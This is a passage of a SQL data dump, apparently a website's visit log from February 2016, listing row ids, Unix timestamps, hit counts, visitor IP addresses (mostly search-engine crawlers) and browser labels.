0,'141.8.184.22','other'),(8986,1456521316,1,1,0,0,'93.158.152.26','other'),(8987,1456521321,1,1,0,0,'141.8.132.76','other'),(8988,1456521324,1,1,0,0,'5.255.253.100','other'),(8989,1456521325,3,3,0,0,'91.209.51.22','other'),(8990,1456521329,1,1,0,0,'141.8.142.88','other'),(8991,1456521332,1,1,0,0,'130.193.37.21','other'),(8992,1456521336,1,1,0,0,'141.8.132.97','other'),(8993,1456521340,1,1,0,0,'141.8.184.18','other'),(8994,1456521344,1,1,0,0,'5.255.253.10','other'),(8995,1456521391,4,4,0,0,'66.249.64.177','other'),(8996,1456521887,1,0,1,0,'66.249.64.182',''),(8997,1456522143,3,3,0,0,'66.249.64.182','other'),(8998,1456522259,2,2,0,0,'66.249.64.172','other'),(8999,1456522650,1,1,0,0,'180.76.15.161','other'),(9000,1456522886,1,1,0,0,'66.249.81.211','other'),(9001,1456522909,1,0,1,0,'66.249.64.177',''),(9002,1456522913,4,3,1,0,'66.249.64.177',''),(9003,1456523181,1,1,0,0,'217.69.133.3','other'),(9004,1456523192,4,4,0,0,'66.249.64.172','other'),(9005,1456523296,1,1,0,0,'66.249.64.27','other'),(9006,1456523427,2,1,1,0,'66.249.64.182',''),(9007,1456523608,64,64,0,0,'82.193.127.15','other'),(9008,1456523893,2,2,0,0,'66.249.64.177','other'),(9009,1456523943,1,1,0,0,'157.55.39.69','other'),(9010,1456524141,1,1,0,0,'66.249.89.87','other'),(9011,1456524174,4,3,1,0,'66.249.64.172',''),(9012,1456524516,4,4,0,0,'178.154.149.11','other'),(9013,1456524524,8,8,0,0,'141.8.184.18','other'),(9014,1456524560,1,0,1,0,'68.180.229.232',''),(9015,1456524613,1,1,0,0,'8.29.198.25','other'),(9016,1456524744,4,4,0,0,'66.249.64.172','other'),(9017,1456524857,1,0,1,0,'66.249.64.177',''),(9018,1456524898,1,1,0,0,'66.249.64.27','other'),(9019,1456524941,1,1,0,0,'178.154.189.204','other'),(9020,1456525243,1,0,1,0,'66.249.64.182',''),(9021,1456525528,2,1,1,0,'66.249.64.22',''),(9022,1456525659,1,1,0,0,'66.249.93.86','chrome'),(9023,1456525762,2,1,1,0,'66.249.64.172',''),(9024,1456525879,1,1,0,0,'66.249.64.182','other'),(9025,1456525949,3,3,0,0,'66.249.64.177','other'),(9026,1456526252,3,3,0,0,'66.249.64.172','other'),(9027,1456526413,1,1,0,0,'66.249.81.205','other'),(9028,1456527023,5,5,0,0,'66.249.64.177','other'),(9029,1456527093,2,2,0,0,'66.249.64.182','other'),(9030,1456527394,1,1,0,0,'141.8.184.18','other'),(9031,1456527398,1,1,0,0,'5.255.253.53','other'),(9032,1456527443,6,6,0,0,'66.249.64.172','other'),(9033,1456527538,1,1,0,0,'66.249.64.22','other'),(9034,1456527780,1,0,1,0,'68.180.229.232',''),(9035,1456527788,1,1,0,0,'157.55.39.196','other'),(9036,1456527988,1,0,1,0,'66.249.64.177',''),(9037,1456528027,2,2,0,0,'66.249.64.177','other'),(9038,1456528449,3,2,1,0,'66.249.64.182',''),(9039,1456528456,8,8,0,0,'66.249.64.172','other'),(9040,1456528613,1,1,0,0,'66.249.64.27','other'),(9041,1456528626,2,2,0,0,'157.55.39.69','other'),(9042,1456529023,1,0,1,0,'68.180.229.232',''),(9043,1456529143,3,3,0,0,'66.249.64.182','other'),(9044,1456529373,6,5,1,0,'66.249.64.172',''),(9045,1456529419,7,7,0,0,'66.249.64.177','other'),(9046,1456529583,2,2,0,0,'66.249.64.22','other'),(9047,1456530081,1,1,0,0,'66.249.81.205','other'),(9048,1456530305,3,2,1,0,'66.249.64.172',''),(9049,1456530423,4,4,0,0,'66.249.64.182','other'),(9050,1456530492,1,1,0,0,'66.249.64.22','other'),(9051,1456530515,6,6,0,0,'66.249.64.177','other'),(9052,1456530655,8,8,0,0,'66.249.64.172','other'),(9053,1456530662,1,0,1,0,'68.180.229.232',''),(9054,1456531106,1,1,0,0,'178.154.189.204','other'),(9055,1456531334,1,1,0,0,'66.249.64.27','other'),(9056,1456531447,3,3,0,0,'66.249.64.182','other'),(9057,1456531796,3,1,2,0,'66.249.64.177',''),(9058,1456531914,7,7,0,0,'66.249.64.172','other'),(9059,1456532100,2,2,0,0,'66.249.64.22','other'),(9060,1456532347,2,2,0,0,'178.154.189.204','other'),(9061,1456532449,2,2,0,0,'66.249.64.182','other'),(9062,1456532659,3,3,0,0,'66.249.64.177','other'),(9063,1456532916,1,1,0,0,'62.210.215.100','chrome'),(9064,1456532942,3,3,0,0,'66.249.64.172','other'),(9065,1456533335,1,1,0,0,'66.249.64.27','other'),(9066,1456533359,3,3,0,0,'66.249.64.182','other'),(9067,1456533390,1,1,0,0,'157.55.39.196','other'),(9068,1456533566,1,1,0,0,'178.154.189.204','other'),(9069,1456533568,6,5,1,0,'66.249.64.177',''),(9070,1456534019,1,1,0,0,'66.249.64.22','other'),(9071,1456534077,2,2,0,0,'178.154.149.11','other'),(9072,1456534139,1,1,0,0,'66.249.64.32','other'),(9073,1456534270,5,4,1,0,'66.249.64.172',''),(9074,1456534619,3,3,0,0,'66.249.64.182','other'),(9075,1456534943,2,1,1,0,'66.249.64.177',''),(9076,1456534966,7,5,2,0,'66.249.64.172',''),(9077,1456535070,1,1,0,0,'66.249.89.87','other'),(9078,1456535104,1,1,0,0,'217.69.133.239','other'),(9079,1456535442,1,1,0,0,'8.29.198.25','other'),(9080,1456535666,2,2,0,0,'66.249.64.182','other'),(9081,1456535732,1,0,1,0,'66.249.64.22',''),(9082,1456535777,1,1,0,0,'217.69.133.244','other'),(9083,1456535814,6,6,0,0,'66.249.64.172','other'),(9084,1456535877,1,0,1,0,'66.249.64.27',''),(9085,1456536085,4,3,1,0,'66.249.64.177',''),(9086,1456536367,6,6,0,0,'66.249.64.177','other'),(9087,1456536735,2,2,0,0,'141.8.184.18','other'),(9088,1456536745,1,0,1,0,'66.249.64.172',''),(9089,1456536831,7,6,1,0,'66.249.64.172',''),(9090,1456536997,6,5,1,0,'66.249.64.172',''),(9091,1456537205,1,1,0,0,'66.249.64.22','other'),(9092,1456537349,1,1,0,0,'207.46.13.161','other'),(9093,1456537388,2,0,2,0,'66.249.64.177',''),(9094,1456537445,2,2,0,0,'178.154.189.204','other'),(9095,1456537550,3,2,1,0,'66.249.64.177',''),(9096,1456537672,2,2,0,0,'66.249.64.172','other'),(9097,1456537674,2,0,2,0,'68.180.229.232',''),(9098,1456538069,3,2,1,0,'66.249.64.182',''),(9099,1456538187,1,1,0,0,'217.69.133.253','other'),(9100,1456538694,1,1,0,0,'93.158.152.9','other'),(9101,1456538698,1,1,0,0,'141.8.184.18','other'),(9102,1456538708,1,1,0,0,'217.69.133.222','other'),(9103,1456538860,2,1,1,0,'66.249.64.177',''),(9104,1456538883,3,3,0,0,'66.249.64.182','other'),(9105,1456539307,1,0,1,0,'68.180.229.232',''),(9106,1456539512,1,1,0,0,'37.9.122.201','other'),(9107,1456539545,2,2,0,0,'66.249.64.172','other'),(9108,1456539746,3,1,2,0,'66.249.64.177',''),(9109,1456539792,4,4,0,0,'66.249.64.182','other'),(9110,1456540489,1,1,0,0,'178.154.149.11','other'),(9111,1456540492,1,1,0,0,'141.8.184.18','other'),(9112,1456540609,1,1,0,0,'66.249.64.32','other'),(9113,1456540725,1,1,0,0,'66.249.64.182','other'),(9114,1456540842,4,3,1,0,'66.249.64.177',''),(9115,1456541235,1,0,1,0,'66.249.64.27',''),(9116,1456541332,5,4,1,0,'66.249.64.172',''),(9117,1456541707,1,1,0,0,'66.249.64.182','other'),(9118,1456541799,2,1,1,0,'66.249.64.177',''),(9119,1456541831,3,3,0,0,'66.249.64.177','other'),(9120,1456542544,5,5,0,0,'66.249.64.172','other'),(9121,1456542614,4,4,0,0,'66.249.64.182','other'),(9122,1456542894,2,2,0,0,'66.249.64.177','other'),(9123,1456543036,1,1,0,0,'178.154.149.11','other'),(9124,1456543040,1,1,0,0,'141.8.184.18','other'),(9125,1456543309,1,0,1,0,'66.249.64.22',''),(9126,1456543830,1,0,1,0,'66.249.64.182',''),(9127,1456543872,1,0,1,0,'68.180.229.232',''),(9128,1456543875,1,1,0,0,'66.249.64.182','other'),(9129,1456544573,2,2,0,0,'207.46.13.161','other'),(9130,1456545041,1,1,0,0,'92.113.189.30','chrome'),(9131,1456545153,2,2,0,0,'66.249.64.172','other'),(9132,1456545371,1,1,0,0,'157.55.39.196','other'),(9133,1456545375,1,1,0,0,'141.8.184.18','other'),(9134,1456545378,1,1,0,0,'93.158.152.9','other'),(9135,1456545409,1,0,1,0,'68.180.229.232',''),(9136,1456545540,1,1,0,0,'66.249.89.90','other'),(9137,1456545545,1,1,0,0,'66.249.64.32','other'),(9138,1456545557,1,1,0,0,'217.69.133.194','other'),(9139,1456545684,2,2,0,0,'66.249.64.22','other'),(9140,1456545730,3,2,1,0,'66.249.64.182',''),(9141,1456546059,1,0,1,0,'66.249.64.172',''),(9142,1456546259,1,1,0,0,'8.29.198.26','other'),(9143,1456546385,1,0,1,0,'68.180.229.232',''),(9144,1456546528,1,1,0,0,'217.69.133.4','other'),(9145,1456546538,1,1,0,0,'141.0.15.134','other'),(9146,1456546770,1,1,0,0,'66.249.64.32','other'),(9147,1456546912,3,0,3,0,'66.249.64.182',''),(9148,1456547689,2,0,2,0,'66.249.64.177',''),(9149,1456547808,1,0,1,0,'66.249.64.172',''),(9150,1456548150,1,0,1,0,'68.180.229.232',''),(9151,1456548151,1,1,0,0,'5.34.34.176','chrome'),(9152,1456548531,1,1,0,0,'141.8.184.22','other'),(9153,1456548535,1,1,0,0,'141.8.184.11','other'),(9154,1456549591,1,0,1,0,'66.249.64.182',''),(9155,1456549849,2,0,2,0,'66.249.64.177',''),(9156,1456549964,1,1,0,0,'5.167.121.79','chrome'),(9157,1456550037,1,0,1,0,'66.249.64.27',''),(9158,1456550149,1,1,0,0,'217.69.133.245','other'),(9159,1456550354,2,0,2,0,'66.249.64.172',''),(9160,1456550366,1,0,1,0,'68.180.229.232',''),(9161,1456550458,5,5,0,0,'141.8.184.18','other'),(9162,1456550462,4,4,0,0,'93.158.152.9','other'),(9163,1456550998,1,1,0,0,'130.193.51.85','other'),(9164,1456551002,1,1,0,0,'130.193.50.22','other'),(9165,1456551003,1,1,0,0,'66.249.64.172','other'),(9166,1456551067,1,1,0,0,'93.158.152.26','other'),(9167,1456551070,1,1,0,0,'130.193.51.43','other'),(9168,1456551076,1,1,0,0,'5.255.253.30','other'),(9169,1456551079,1,1,0,0,'141.8.184.11','other'),(9170,1456551181,10,10,0,0,'5.255.253.53','other'),(9171,1456551207,8,8,0,0,'178.154.149.11','other'),(9172,1456551210,4,4,0,0,'141.8.132.99','other'),(9173,1456551226,7,7,0,0,'141.8.183.14','other'),(9174,1456551230,1,1,0,0,'178.154.189.6','other'),(9175,1456551233,1,1,0,0,'141.8.132.76','other'),(9176,1456551491,6,6,0,0,'93.158.152.9','other'),(9177,1456551628,3,3,0,0,'5.255.253.100','other'),(9178,1456551716,37,37,0,0,'141.8.184.18','other'),(9179,1456551770,4,4,0,0,'130.193.51.45','other'),(9180,1456552104,7,7,0,0,'130.193.37.21','other'),(9181,1456552139,16,16,0,0,'141.8.183.14','other'),(9182,1456552140,16,16,0,0,'178.154.149.11','other'),(9183,1456552154,9,9,0,0,'141.8.132.99','other'),(9184,1456552161,2,0,2,0,'66.249.64.172',''),(9185,1456552348,5,5,0,0,'5.255.253.53','other'),(9186,1456552461,6,6,0,0,'93.158.152.9','other'),(9187,1456552521,1,1,0,0,'157.55.39.196','other'),(9188,1456552623,2,2,0,0,'5.255.253.100','other'),(9189,1456552634,1,1,0,0,'141.8.184.18','other'),(9190,1456552922,2,2,0,0,'207.46.13.4','other'),(9191,1456553013,3,0,3,0,'66.249.64.177',''),(9192,1456553156,1,0,1,0,'66.249.64.32',''),(9193,1456553194,1,1,0,0,'141.0.15.8','other'),(9194,1456553456,2,0,2,0,'66.249.64.182',''),(9195,1456553522,1,1,0,0,'194.150.168.79','chrome'),(9196,1456553563,1,1,0,0,'62.210.215.100','chrome'),(9197,1456553812,3,3,0,0,'141.8.183.14','other'),(9198,1456553816,2,2,0,0,'5.255.253.53','other'),(9199,1456553820,3,3,0,0,'141.8.132.99','other'),(9200,1456553828,3,3,0,0,'178.154.149.11','other'),(9201,1456553873,1,1,0,0,'157.55.39.196','other'),(9202,1456553875,2,2,0,0,'93.158.152.9','other'),(9203,1456553876,2,2,0,0,'130.193.37.21','other'),(9204,1456553907,2,2,0,0,'141.8.184.18','other'),(9205,1456554002,1,1,0,0,'207.46.13.161','other'),(9206,1456554087,1,1,0,0,'157.55.39.69','other'),(9207,1456554538,1,1,0,0,'66.249.64.172','other'),(9208,1456554631,1,0,1,0,'66.249.64.177',''),(9209,1456554769,1,1,0,0,'141.8.132.2','other'),(9210,1456554773,1,1,0,0,'178.154.149.11','other'),(9211,1456555082,1,1,0,0,'217.69.133.244','other'),(9212,1456555124,1,1,0,0,'207.46.13.4','other'),(9213,1456555271,1,1,0,0,'93.158.152.9','other'),(9214,1456555272,1,1,0,0,'5.255.253.53','other'),(9215,1456555527,1,1,0,0,'66.249.64.177','other'),(9216,1456555562,2,0,2,0,'66.249.64.172',''),(9217,1456556090,1,1,0,0,'66.249.89.87','other'),(9218,1456556546,1,1,0,0,'93.158.152.9','other'),(9219,1456556547,1,1,0,0,'5.255.253.100','other'),(9220,1456556608,1,1,0,0,'207.46.13.4','other'),(9221,1456556994,1,1,0,0,'66.249.64.172','other'),(9222,1456557058,1,1,0,0,'141.8.184.11','other'),(9223,1456557105,1,1,0,0,'8.29.198.25','other'),(9224,1456557202,1,0,1,0,'68.180.229.232',''),(9225,1456558202,1,1,0,0,'207.46.13.161','other'),(9226,1456558389,1,1,0,0,'176.77.71.89','opera'),(9227,1456558781,1,1,0,0,'66.249.64.172','other'),(9228,1456558872,1,1,0,0,'5.255.253.62','other'),(9229,1456558873,1,1,0,0,'141.8.132.109','other'),(9230,1456558875,1,1,0,0,'141.8.142.88','other'),(9231,1456558877,5,5,0,0,'178.154.149.11','other'),(9232,1456558908,1,1,0,0,'66.249.81.205','other'),(9233,1456559198,1,1,0,0,'141.8.184.18','other'),(9234,1456559363,2,0,2,0,'66.249.64.182',''),(9235,1456559969,1,1,0,0,'66.249.64.182','other'),(9236,1456560102,1,1,0,0,'207.46.13.4','other'),(9237,1456560186,1,0,1,0,'68.180.229.232',''),(9238,1456560555,1,1,0,0,'91.196.178.129','chrome'),(9239,1456560578,15,15,0,0,'82.193.127.15','other'),(9240,1456560840,1,0,1,0,'66.249.64.177',''),(9241,1456560870,2,1,1,0,'66.249.64.177',''),(9242,1456560950,1,0,1,0,'66.249.64.172',''),(9243,1456561057,2,1,1,0,'66.249.64.172',''),(9244,1456561152,1,1,0,0,'177.75.16.71','other'),(9245,1456561223,1,1,0,0,'66.249.64.177','other'),(9246,1456561305,1,1,0,0,'66.249.93.90','firefox'),(9247,1456561826,2,2,0,0,'141.8.184.18','other'),(9249,1456561827,1,1,0,0,'178.154.149.11','other'),(9250,1456561846,1,0,1,0,'66.249.64.27',''),(9251,1456562016,1,0,1,0,'66.249.64.32',''),(9252,1456562038,1,0,1,0,'66.249.64.172',''),(9253,1456562111,1,1,0,0,'82.207.113.219','chrome'),(9254,1456562134,1,1,0,0,'178.93.148.206','chrome'),(9255,1456562135,1,1,0,0,'66.249.64.32','other'),(9256,1456562138,1,1,0,0,'180.76.15.151','other'),(9257,1456562390,1,0,1,0,'66.249.64.177',''),(9258,1456562505,1,1,0,0,'66.249.81.211','other'),(9259,1456562552,1,0,1,0,'66.249.64.182',''),(9260,1456562554,3,2,1,0,'66.249.64.182',''),(9261,1456562650,1,1,0,0,'207.46.13.161','other'),(9262,1456562870,1,1,0,0,'66.249.64.182','other'),(9263,1456562894,1,1,0,0,'91.196.178.68','other'),(9264,1456563482,1,1,0,0,'217.69.136.206','other'),(9265,1456563782,1,1,0,0,'178.154.149.11','other'),(9266,1456563860,95,95,0,0,'80.91.162.99','other'),(9267,1456564295,3,3,0,0,'66.249.64.182','other'),(9268,1456564373,1,1,0,0,'5.45.255.70','chrome'),(9269,1456564452,1,0,1,0,'66.249.64.177',''),(9270,1456564777,3,1,2,0,'66.249.64.172',''),(9271,1456564916,1,1,0,0,'66.249.64.177','other'),(9272,1456565125,1,1,0,0,'91.196.178.65','chrome'),(9273,1456565159,1,1,0,0,'157.55.39.69','other'),(9274,1456565582,2,2,0,0,'66.249.64.172','other'),(9275,1456565750,1,1,0,0,'46.165.230.5','chrome'),(9276,1456566149,1,1,0,0,'66.249.81.205','other'),(9277,1456566894,1,1,0,0,'66.249.64.177','other'),(9278,1456567010,1,1,0,0,'93.158.152.9','other'),(9279,1456567038,1,0,1,0,'66.249.64.182',''),(9280,1456567072,1,0,1,0,'68.180.229.232',''),(9281,1456567083,1,1,0,0,'217.69.133.249','other'),(9282,1456567121,1,1,0,0,'66.249.89.90','other'),(9283,1456567144,1,1,0,0,'66.249.64.182','other'),(9284,1456568036,1,1,0,0,'8.29.198.26','other'),(9285,1456568239,1,0,1,0,'66.249.64.172',''),(9286,1456568562,1,1,0,0,'207.46.13.4','other'),(9287,1456568694,1,1,0,0,'141.8.184.18','other'),(9288,1456568695,1,1,0,0,'141.8.183.14','other'),(9289,1456568696,1,1,0,0,'178.154.149.11','other'),(9290,1456568857,2,2,0,0,'66.249.64.172','other'),(9291,1456568983,3,3,0,0,'66.249.64.177','other'),(9292,1456569247,1,1,0,0,'37.9.122.203','other'),(9293,1456569250,2,2,0,0,'37.9.122.202','other'),(9294,1456569327,2,2,0,0,'66.249.64.182','other'),(9295,1456569817,1,1,0,0,'66.249.81.205','other'),(9296,1456570202,1,1,0,0,'66.249.64.177','other'),(9297,1456570613,24,24,0,0,'82.193.127.15','other'),(9298,1456570706,1,1,0,0,'66.249.64.172','other'),(9299,1456570802,1,0,1,0,'68.180.229.232',''),(9300,1456571162,1,1,0,0,'37.54.21.221','chrome'),(9301,1456571303,1,1,0,0,'66.249.64.182','other'),(9302,1456571855,1,1,0,0,'91.196.178.135','chrome'),(9303,1456571998,1,1,0,0,'178.92.248.85','firefox'),(9304,1456572016,3,1,2,0,'66.249.64.177',''),(9305,1456572277,2,1,1,0,'66.249.64.182',''),(9306,1456572325,4,0,4,0,'66.249.64.172',''),(9307,1456572515,1,1,0,0,'157.55.39.69','other'),(9308,1456572544,1,1,0,0,'183.207.228.116','firefox'),(9309,1456572547,1,1,0,0,'120.198.231.21','firefox'),(9310,1456572549,1,1,0,0,'117.136.234.6','chrome'),(9311,1456572552,1,1,0,0,'117.177.250.152','chrome'),(9312,1456572843,1,1,0,0,'66.249.64.172','other'),(9313,1456573096,2,2,0,0,'66.249.64.177','other'),(9314,1456573119,1,1,0,0,'180.76.15.10','other'),(9315,1456573163,1,1,0,0,'66.249.64.182','other'),(9316,1456573283,1,1,0,0,'66.249.81.208','other'),(9317,1456573385,1,1,0,0,'93.73.98.49','other'),(9318,1456573426,1,1,0,0,'157.55.39.196','other'),(9319,1456573585,237,237,0,0,'109.87.138.56','other'),(9320,1456573625,1,1,0,0,'62.210.215.100','chrome'),(9321,1456574109,1,1,0,0,'46.242.92.0','chrome'),(9322,1456574110,1,1,0,0,'46.188.32.37','msie'),(9323,1456574111,1,1,0,0,'37.204.154.137','msie'),(9326,1456574248,1,1,0,0,'62.141.50.134','other'),(9327,1456574320,5,1,4,0,'66.249.64.177',''),(9328,1456574430,28,0,28,0,'66.249.64.172',''),(9329,1456574466,1,0,1,0,'66.249.64.32',''),(9330,1456574776,1,0,1,0,'66.249.64.182',''),(9331,1456574800,3,0,3,0,'66.249.64.27',''),(9332,1456574807,3,1,2,0,'66.249.64.172',''),(9333,1456574832,67,2,65,0,'66.249.64.172',''),(9334,1456575253,1,0,1,0,'66.249.64.22',''),(9335,1456575393,21,1,20,0,'66.249.64.172',''),(9336,1456575499,5,0,5,0,'66.249.64.177',''),(9337,1456575660,2,2,0,0,'141.8.184.18','other'),(9338,1456575935,1,1,0,0,'66.102.9.104','firefox'),(9339,1456575949,3,1,2,0,'66.249.64.177',''),(9340,1456576341,1,0,1,0,'68.180.229.232',''),(9341,1456576425,2,0,2,0,'66.249.64.172',''),(9342,1456576461,3,1,2,0,'66.249.64.172',''),(9343,1456576641,1,0,1,0,'66.249.64.182',''),(9344,1456576681,2,1,1,0,'66.249.64.172',''),(9345,1456576727,22,1,21,0,'66.249.64.172',''),(9346,1456576905,1,1,0,0,'207.46.13.182','other'),(9347,1456576920,1,1,0,0,'66.249.81.208','other'),(9348,1456577233,35,1,34,0,'66.249.64.172',''),(9349,1456577469,1,1,0,0,'94.179.108.202','firefox'),(9350,1456577623,4,1,3,0,'66.249.64.172',''),(9351,1456577646,24,1,23,0,'66.249.64.172',''),(9352,1456577653,1,0,1,0,'66.249.64.22',''),(9353,1456577745,2,0,2,0,'66.249.64.32',''),(9354,1456577825,3,3,0,0,'141.8.184.18','other'),(9355,1456577833,2,2,0,0,'141.8.183.14','other'),(9356,1456577905,1,1,0,0,'93.158.152.9','other'),(9357,1456577982,1,1,0,0,'66.249.89.87','other'),(9358,1456578151,2,1,1,0,'66.249.64.172',''),(9359,1456578315,2,0,2,0,'68.180.229.232',''),(9360,1456578360,6,1,5,0,'66.249.64.172',''),(9361,1456578380,2,0,2,0,'66.249.64.177',''),(9362,1456578449,1,0,1,0,'66.249.64.27',''),(9363,1456578703,9,4,5,0,'66.249.64.172',''),(9364,1456578872,1,1,0,0,'8.29.198.25','other'),(9365,1456579002,5,2,3,0,'66.249.64.177',''),(9366,1456579568,1,1,0,0,'157.55.39.196','other'),(9367,1456579596,1,0,1,0,'66.249.64.182',''),(9368,1456579683,1,1,0,0,'217.69.133.72','other'),(9369,1456579724,9,0,9,0,'66.249.64.172',''),(9370,1456579753,2,0,2,0,'68.180.229.232',''),(9371,1456580265,2,1,1,0,'66.249.64.177',''),(9372,1456580291,17,2,15,0,'66.249.64.172',''),(9373,1456580484,1,1,0,0,'66.249.81.211','other'),(9374,1456580548,1,0,1,0,'66.249.64.182',''),(9375,1456580783,1,0,1,0,'66.249.64.27',''),(9376,1456581001,13,1,12,0,'66.249.64.172',''),(9377,1456581012,1,0,1,0,'66.249.64.22',''),(9378,1456581097,1,1,0,0,'94.179.74.188','firefox'),(9379,1456581388,1,1,0,0,'157.55.39.196','other'),(9380,1456581460,10,1,9,0,'66.249.64.172',''),(9381,1456581810,2,2,0,0,'93.158.152.9','other'),(9382,1456581888,4,2,2,0,'66.249.64.172',''),(9383,1456581984,2,2,0,0,'157.55.39.69','other'),(9384,1456582111,1,1,0,0,'176.102.202.77','chrome'),(9385,1456582123,3,3,0,0,'178.154.149.11','other'),(9386,1456582129,1,0,1,0,'66.249.64.177',''),(9387,1456582166,4,4,0,0,'141.8.184.18','other'),(9388,1456582206,3,3,0,0,'207.46.13.182','other'),(9389,1456582265,3,2,1,0,'66.249.64.177',''),(9390,1456582469,1,1,0,0,'91.196.178.39','chrome'),(9391,1456582534,1,1,0,0,'5.255.253.100','other'),(9392,1456582763,3,3,0,0,'93.158.152.9','other'),(9393,1456582768,1,1,0,0,'141.8.183.14','other'),(9394,1456582818,25,0,25,0,'66.249.64.172',''),(9395,1456582831,2,0,2,0,'66.249.64.22',''),(9396,1456583184,13,13,0,0,'141.8.184.18','other'),(9397,1456583209,7,7,0,0,'178.154.149.11','other'),(9398,1456583213,6,6,0,0,'5.255.253.53','other'),(9399,1456583275,2,0,2,0,'66.249.64.177',''),(9400,1456583322,3,1,2,0,'66.249.64.172',''),(9401,1456583368,2,1,1,0,'66.249.64.172',''),(9402,1456583414,2,2,0,0,'66.249.64.172','other'),(9403,1456583481,2,0,2,0,'68.180.229.232',''),(9404,1456583636,3,3,0,0,'5.255.253.100','other'),(9405,1456583657,2,2,0,0,'141.8.132.99','other'),(9406,1456583844,6,6,0,0,'93.158.152.9','other'),(9407,1456583875,7,7,0,0,'141.8.183.14','other'),(9408,1456583979,1,1,0,0,'95.27.10.11','firefox'),(9409,1456584052,1,1,0,0,'91.196.178.36','chrome'),(9410,1456584090,21,21,0,0,'141.8.184.18','other'),(9411,1456584138,16,16,0,0,'178.154.149.11','other'),(9412,1456584145,1,1,0,0,'207.46.13.182','other'),(9413,1456584162,1,1,0,0,'66.249.81.166','other'),(9414,1456584215,1,1,0,0,'5.255.253.53','other'),(9415,1456584569,8,0,8,0,'66.249.64.172',''),(9416,1456584702,10,1,9,0,'66.249.64.172',''),(9417,1456585029,1,0,1,0,'66.249.64.182',''),(9418,1456585066,3,3,0,0,'130.193.37.21','other'),(9419,1456585072,1,1,0,0,'207.241.226.216','other'),(9420,1456585080,1,0,1,0,'66.249.64.177',''),(9421,1456585132,2,0,2,0,'68.180.229.232',''),(9422,1456585614,7,7,0,0,'141.8.184.18','other'),(9423,1456585618,2,2,0,0,'141.8.183.14','other'),(9424,1456585772,2,0,2,0,'66.249.64.32',''),(9425,1456586378,4,0,4,0,'66.249.64.182',''),(9426,1456586440,9,0,9,0,'66.249.64.172',''),(9427,1456586472,2,1,1,0,'66.249.64.177',''),(9428,1456586775,2,0,2,0,'66.249.64.22',''),(9429,1456586780,10,1,9,0,'66.249.64.172',''),(9430,1456586794,1,1,0,0,'66.249.64.22','other'),(9431,1456586853,2,2,0,0,'178.154.149.11','other'),(9432,1456587069,1,1,0,0,'66.249.64.172','other'),(9433,1456587481,2,2,0,0,'62.210.215.100','chrome'),(9434,1456587681,1,1,0,0,'66.249.81.211','other'),(9435,1456587713,1,1,0,0,'66.249.64.182','other'),(9436,1456587736,1,1,0,0,'157.55.39.69','other'),(9437,1456587903,4,4,0,0,'93.158.152.9','other'),(9438,1456588270,5,5,0,0,'141.8.184.18','other'),(9439,1456588274,6,6,0,0,'178.154.149.11','other'),(9440,1456588286,4,4,0,0,'141.8.183.14','other'),(9441,1456588316,1,1,0,0,'5.255.253.10','other'),(9442,1456588320,2,2,0,0,'130.193.51.81','other'),(9443,1456588324,1,1,0,0,'93.158.152.26','other'),(9444,1456588336,1,1,0,0,'207.46.13.182','other'),(9445,1456588446,1,1,0,0,'5.255.253.9','other'),(9446,1456588453,1,1,0,0,'141.8.184.22','other'),(9447,1456588457,3,3,0,0,'5.255.253.53','other'),(9448,1456588473,1,1,0,0,'141.8.132.99','other'),(9449,1456588579,2,0,2,0,'66.249.64.177',''),(9450,1456589069,1,1,0,0,'66.249.64.182','other'),(9451,1456589115,20,1,19,0,'66.249.64.172',''),(9452,1456589161,2,1,1,0,'66.249.64.177',''),(9453,1456589281,1,1,0,0,'66.249.89.87','other'),(9454,1456589691,1,1,0,0,'8.29.198.26','other'),(9455,1456589759,3,3,0,0,'66.249.64.177','other'),(9456,1456590136,2,1,1,0,'66.249.64.182',''),(9457,1456590234,5,5,0,0,'141.8.184.18','other'),(9458,1456590239,5,5,0,0,'93.158.152.9','other'),(9459,1456590240,4,4,0,0,'141.8.183.14','other'),(9460,1456590241,2,2,0,0,'130.193.37.21','other'),(9462,1456590252,1,1,0,0,'5.255.253.53','other'),(9463,1456591084,5,0,5,0,'68.180.229.232',''),(9464,1456591448,1,1,0,0,'66.249.81.208','other'),(9465,1456591569,3,0,3,0,'66.249.64.177',''),(9466,1456591572,27,0,27,0,'66.249.64.172',''),(9467,1456591633,2,0,2,0,'66.249.64.22',''),(9468,1456591663,1,0,1,0,'66.249.64.27',''),(9469,1456592076,1,0,1,0,'68.180.229.232',''),(9470,1456592483,1,0,1,0,'66.249.64.172',''),(9471,1456592615,4,4,0,0,'178.154.149.11','other'),(9472,1456592616,5,5,0,0,'141.8.184.18','other'),(9473,1456592617,2,2,0,0,'93.158.152.9','other'),(9474,1456592620,2,2,0,0,'5.255.253.53','other'),(9475,1456592631,2,2,0,0,'141.8.183.14','other'),(9476,1456593468,2,0,2,0,'66.249.64.182',''),(9477,1456593482,3,0,3,0,'66.249.64.177',''),(9478,1456593489,15,0,15,0,'66.249.64.172',''),(9479,1456593498,3,0,3,0,'66.249.64.22',''),(9480,1456593654,1,1,0,0,'213.179.252.150','chrome'),(9481,1456594556,8,8,0,0,'141.8.184.18','other'),(9482,1456594557,8,8,0,0,'141.8.183.14','other'),(9483,1456594559,5,5,0,0,'93.158.152.9','other'),(9484,1456594561,19,19,0,0,'178.154.149.11','other'),(9485,1456594562,4,4,0,0,'5.255.253.53','other'),(9486,1456594569,1,1,0,0,'130.193.37.21','other'),(9487,1456594705,1,1,0,0,'207.46.13.28','other'),(9488,1456594778,2,2,0,0,'130.193.51.85','other'),(9490,1456594779,1,1,0,0,'141.8.132.44','other'),(9491,1456594783,1,1,0,0,'5.255.253.110','other'),(9492,1456594793,1,1,0,0,'141.8.132.99','other'),(9493,1456594794,1,1,0,0,'141.8.142.88','other'),(9494,1456594795,2,2,0,0,'5.255.253.30','other'),(9496,1456594797,1,1,0,0,'141.8.142.8','other'),(9498,1456594798,1,1,0,0,'5.255.253.94','other'),(9499,1456594799,1,1,0,0,'5.255.253.62','other'),(9500,1456594800,1,1,0,0,'141.8.142.55','other'),(9502,1456594801,2,2,0,0,'141.8.184.31','other'),(9503,1456594802,1,1,0,0,'141.8.184.11','other'),(9504,1456594804,1,1,0,0,'141.8.132.74','other'),(9506,1456594881,1,0,1,0,'68.180.229.232',''),(9507,1456594888,1,1,0,0,'66.249.81.205','other'),(9508,1456594950,4,0,4,0,'66.249.64.177',''),(9509,1456594984,6,0,6,0,'66.249.64.172',''),(9510,1456594990,2,0,2,0,'66.249.64.27',''),(9511,1456595777,1,1,0,0,'157.55.39.163','other'),(9512,1456596104,2,0,2,0,'68.180.229.232',''),(9513,1456596820,4,0,4,0,'66.249.64.177',''),(9514,1456596829,73,0,73,0,'66.249.64.172',''),(9515